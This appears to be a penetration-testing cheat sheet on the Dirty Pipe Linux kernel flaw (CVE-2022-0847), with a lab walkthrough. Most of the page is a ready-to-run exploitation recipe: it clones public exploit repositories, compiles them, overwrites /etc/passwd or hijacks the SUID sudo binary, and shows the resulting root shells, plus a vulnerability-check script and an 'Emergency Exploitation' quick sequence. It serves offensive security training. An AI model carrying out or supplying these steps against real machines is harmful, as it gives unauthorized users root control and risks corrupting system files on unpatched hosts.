π§Dirty Pipe
π― Overview
Dirty Pipe kernel vulnerability allows unauthorized writing to root-owned files through pipe mechanism exploitation, similar to Dirty Cow but affecting newer kernels (5.8-5.17).
π¨ CVE-2022-0847 Details
Vulnerability Info
Impact: Write to arbitrary files as root with only read access
Affected Kernels: 5.8 to 5.17 (including Android)
Mechanism: Pipe-based unidirectional communication exploitation
Similar to: Dirty Cow (CVE-2016-5195) but different attack vector
Kernel Version Check
# Check vulnerable kernel version
uname -r
# Vulnerable: 5.8.x - 5.17.x
# Examples of vulnerable versions:
# 5.13.0-46-generic
# 5.15.0-25-generic
# 5.16.x-x-genericπ Exploitation
Download and Compile Exploits
# Download Dirty Pipe exploits
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
# Compile both exploits
bash compile.sh
# Creates: exploit-1, exploit-2Method 1: /etc/passwd Modification
# Exploit-1 modifies /etc/passwd to remove root password
./exploit-1
# Output:
# Backing up /etc/passwd to /tmp/passwd.bak ...
# Setting root password to "piped"...
# Password: [enter "piped"]
# Restoring /etc/passwd from /tmp/passwd.bak...
# Done! Popping shell...
# Root shell obtained
id
# uid=0(root) gid=0(root) groups=0(root)Method 2: SUID Binary Hijacking
# Find SUID binaries
find / -perm -4000 2>/dev/null | head -10
# Execute exploit-2 with SUID binary path
./exploit-2 /usr/bin/sudo
# Output:
# [+] hijacking suid binary..
# [+] dropping suid shell..
# [+] restoring suid binary..
# [+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# Root shell obtained
id
# uid=0(root) gid=0(root) groups=0(root)π§ Alternative Exploits
Other Dirty Pipe PoCs
# Additional implementations
git clone https://github.com/febinrev/CVE-2022-0847-DirtyPipe-Exploit.git
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
# Compile and execute
gcc -o dirtypipe exploit.c
./dirtypipeManual File Modification
# Basic concept - write to read-only files
# Requires understanding of pipe mechanics
# Advanced exploitation techniqueπ Detection & Enumeration
Dirty Pipe Vulnerability Check
#!/bin/bash
echo "=== DIRTY PIPE VULNERABILITY CHECK ==="
kernel_version=$(uname -r | cut -d'-' -f1)
echo "Kernel version: $kernel_version"
# Check if kernel version is in vulnerable range
if echo "$kernel_version" | grep -qE "^5\.(8|9|10|11|12|13|14|15|16|17)\."; then
echo "[!] VULNERABLE to CVE-2022-0847 (Dirty Pipe)"
echo "Affected range: 5.8.x - 5.17.x"
echo "Download: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git"
else
echo "[-] Not vulnerable to Dirty Pipe"
fi
echo "[+] Checking for gcc compiler:"
which gcc 2>/dev/null && echo "Compiler available for exploit compilation"Quick Kernel Check
# One-liner vulnerability check
uname -r | grep -qE "^5\.(8|9|10|11|12|13|14|15|16|17)\." && echo "VULNERABLE to Dirty Pipe" || echo "Not vulnerable"π Quick Reference
Immediate Checks
# Kernel version vulnerability
uname -r | grep -E "^5\.(8|9|10|11|12|13|14|15|16|17)\."
# Compiler availability
which gcc g++Emergency Exploitation
# Quick Dirty Pipe exploitation
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh
# Method 1: passwd modification
./exploit-1
# Password: piped
# Method 2: SUID hijacking
./exploit-2 /usr/bin/sudoHTB Academy Example
# 1. Connect to target
ssh htb-student@target
# 2. Check kernel version
uname -r
# Verify: 5.8.x - 5.17.x
# 3. Download and compile
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh
# 4. Execute exploit
./exploit-1 # or ./exploit-2 /usr/bin/sudo
# 5. Get root shell and read flag
cat /root/flag.txtβ οΈ Exploit Considerations
Dirty Pipe Characteristics
Kernel-level vulnerability - Direct kernel exploitation
High reliability - Works on most affected systems
File corruption risk - Can damage system files
Cleanup required - exploit-2 creates /tmp/sh
Limitations
Specific kernel range - Only 5.8-5.17
Compilation needed - Requires gcc on target
Modern systems patched - Fixed in newer kernels
Detection possible - Kernel module monitoring
Dirty Pipe (CVE-2022-0847) exploits kernel pipe mechanisms for arbitrary file writes - any user can modify root-owned files, leading to immediate privilege escalation on vulnerable kernel versions.
Last updated